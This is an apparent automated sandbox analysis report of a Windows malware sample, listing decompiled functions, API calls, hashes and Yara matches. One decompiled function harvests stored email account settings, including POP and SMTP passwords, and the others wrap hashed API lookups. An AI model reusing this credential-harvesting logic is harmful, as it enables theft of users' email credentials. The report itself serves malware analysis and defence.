                        • GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: AttributesFile
                        • String ID:
                        • API String ID: 3188754299-0
                        • Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                        • Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
                        • Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
                        • Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004049FF, Relevance: 1.5, APIs: 1, Instructions: 11registryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}





                        0x00404a0d
                        0x00404a15
                        0x00404a18

                        APIs
                        • RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: Close
                        • String ID:
                        • API String ID: 3535843008-0
                        • Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                        • Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
                        • Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
                        • Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403B64, Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}





                        0x00403b72
                        0x00403b7a
                        0x00403b7d

                        APIs
                        • PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: ExistsFilePath
                        • String ID:
                        • API String ID: 1174141254-0
                        • Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                        • Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
                        • Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
                        • Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                        Download Yara Rule
                        APIs
                        • closesocket.WS2_32(00404EB0), ref: 00404DEB
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: closesocket
                        • String ID:
                        • API String ID: 2781271927-0
                        • Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                        • Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
                        • Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
                        • Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}





                        0x00403fac
                        0x00403fba
                        0x00403fbe

                        APIs
                        • VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                        • Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
                        • Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
                        • Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12sleepCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}





                        0x0040647f
                        0x00406487
                        0x0040648a

                        APIs
                        • Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                        • Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
                        • Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
                        • Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004058EA, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}





                        0x004058f8
                        0x00405903
                        0x00405906

                        APIs
                        • StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                        • Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
                        • Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
                        • Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00405924, Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}





                        0x00405932
                        0x0040593d
                        0x00405940

                        APIs
                        • StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                        • Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
                        • Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
                        • Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Non-executed Functions

                        Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138COMMON
                        Download Yara Rule
                        C-Code - Quality: 88%
                        			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}





















                        0x0040d070
                        0x0040d080
                        0x0040d084
                        0x0040d086
                        0x0040d08c
                        0x0040d0a0
                        0x0040d0ae
                        0x0040d0bd
                        0x0040d0c0
                        0x0040d0c5
                        0x0040d0c9
                        0x0040d0e3
                        0x0040d0f2
                        0x0040d101
                        0x0040d104
                        0x0040d109
                        0x0040d110
                        0x0040d11e
                        0x0040d123
                        0x0040d126
                        0x0040d12d
                        0x0040d145
                        0x0040d154
                        0x0040d15a
                        0x0040d166
                        0x0040d174
                        0x0040d186
                        0x0040d18e
                        0x0040d19a
                        0x0040d1ac
                        0x0040d1ba
                        0x0040d1cc
                        0x0040d1d1
                        0x0040d1dd
                        0x0040d1e2
                        0x0040d1e7
                        0x0040d1e7
                        0x0040d1e7
                        0x0040d1eb
                        0x0040d1f1
                        0x0040d1f7
                        0x0040d1ff
                        0x0040d207
                        0x0040d20f
                        0x0040d217
                        0x0040d21f
                        0x0040d227
                        0x0040d230

                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
                        • API String ID: 0-2111798378
                        • Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                        • Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
                        • Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
                        • Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON
                        Download Yara Rule
                        APIs
                        • CoInitialize.OLE32(00000000), ref: 0040438F
                        • CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
                        • VariantInit.OLEAUT32(?), ref: 004043C4
                        • SysAllocString.OLEAUT32(?), ref: 004043CD
                        • VariantInit.OLEAUT32(?), ref: 00404414
                        • SysAllocString.OLEAUT32(?), ref: 00404419
                        • VariantInit.OLEAUT32(?), ref: 00404431
                        Memory Dump Source
                        • Source File: 00000001.00000002.611891393.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000001.00000002.611933317.00000000004A0000.00000040.00000001.sdmp Download File
                        Yara matches
                        Similarity
                        • API ID: InitVariant$AllocString$CreateInitializeInstance
                        • String ID:
                        • API String ID: 1312198159-0
                        • Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                        • Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
                        • Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
                        • Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94
                        Uniqueness

                        Uniqueness Score: -1.00%